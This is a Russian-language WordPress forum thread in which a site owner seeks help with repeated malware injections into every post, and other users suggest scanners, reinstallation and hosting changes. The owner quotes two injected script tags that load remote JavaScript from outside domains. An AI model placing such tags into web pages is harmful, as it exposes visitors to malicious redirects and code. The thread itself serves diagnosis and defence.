Пароли я везде менял, неделю назат, в плагинах может быть вирус?
Модератор
Юрій
(@yube)
Дыра может быть где угодно. Могли взломать хостинг-систему, могли подложить бэкдор через дырявую Тему или плагин. И еще стопиццот разных вариантов.
Попробуйте поискать заразу скриптом http://www.revisium.com/ai/
я через БД удалил скрипты, но как обычно через неделю сново зальют
wp-user.php Ну тот который был в записях сайта скрипт, я удалил. А вот где дырка, я незнаю!
Может попробывать удалить из хостинга WP и закинуть чистый? Или когда обновляешь WP файлы меняются?
и снова накидали скриптов на каждую запись сайта.
Как проявляется заражение?
Попробуйте использовать мощный, к тому же бесплатный, плагин в этой области http://wordpress.org/extend/plugins/wordfence/ Помимо того, что он обнаруживает (все)возможные заражения, он умеет автоматически восстанавливать файлы после заражения.
Когда заходишь на сайт, антивирус пишет что сайт заражен! А если с мобильног оустройства заходишь, то пересылает на другой сайт!
Хорошо попробую сейчас!
Вот допустим скрипт которым заражали каждую запись сайта
<script type=»text/javascript» src=»http://1iveinternet.ru/code.js»></script>
Когда заходишь на сайт антивирусник Avast пишет что посещение этой странице небезопасно и закрывал страницу!
И писал найден вирус 1iveinternet.ru/code.js
Можно попробовать разобраться, где имеется уязвимость или сделана закладка. Если желаете, можете сделать полный бекап файлов и выслать мне на почту в виде архива. Надеюсь, что объем не запредельный? 🙂 Если нет, то гадать я не готов..
ЗЫ почта в профиле
можете сделать полный бекап файлов и выслать мне на почту
Шелл может быть не только в этих файлах. Нужно смотреть весь хостинг-акк ТСа.
Бывает даже что при криво настроенных серваках хостера с одного акка заражают всех клиентов. Так что тут лечение возможно только на пациенте.
Кроме того — обязательна смена доступов везде, где возможно. Ессно, с чистейшого ПК.
Я неделю назат сменил виндовс, на хосте удалил всё, залил заново WP с офф сайта, сменил пароли, поставил новую тему с архива, удалил все плагины, ну теперь незнаю даже.
Осталось подождать неделю и посмотреть зальют ли сново.
Хост поддержка говорит мне что бы я отказывался от WP и переходил на другой движок.
Хост поддержка говорит мне что бы я отказывался от WP и переходил на другой движок.
С такими советами — менять хостера-советчика. Ибо ВП не ВООБЩЕ ни при причем. Так заражают ЛЮБОЙ сайт.. даже не сайт, а хостинг с поддержкой хтацесса и ПХП.
А вот в заражении может быть виноват как хостер так и пользователь.
Установка кривых\опасных\етс тем и плагов на ВП и несоблюдение правил безопасности — это абсолютная вина юзера (а не движка).
Хост поддержка говорит мне что бы я отказывался от WP и переходил на другой движок.
Чьорт, почему у меня ни одного сайта (все на WP) не взломали, даже обидно. Хотя пытались неоднократно и будут пытаться. Чистить и джумлу и WP приходилось. После экстренной чистки джумло-монстра пересадил сайт на WP — и все дела. И стоят после этого, не взламываются.
Вывод: причина взлома, по большей части — беспечность владельца сайта.
Модератор
Юрій
(@yube)
Ну, мне один вордпресс дефейснули. А заодно и все остальные сайты, включая pure html, которые хостились на том же сервере. Надо отдать должное хостеру — за сутки поднял все бэкапы на другом тазике. А мог бы начать рассказывать про уязвимость html 😉
Кто посоветует хостера?
Хостер! Здесь могла быть ваша реклама!
А ответы тех.поддержки, по крайней мере первый ответ, может быть «смешным», наверное, на любом хостинге. Предполагаю, что тикеты там разбирают «студенты-практиканты», и потом, если они не справляются, запрос идет дальше.
Могу посоветовать плагин Login LockDown, если еще не поставили. Реально помогает от взлома логина. Боты постоянно приходят подбирать пароли.
Мда на этот раз 3 дня всего лишь прошло и новый скрипт накидали
<script type=»text/javascript» src=»http://newstops.ru/stats.js»></script>
Что посоветуете делать? Я уже на всё готов, что бы они от меня отстали!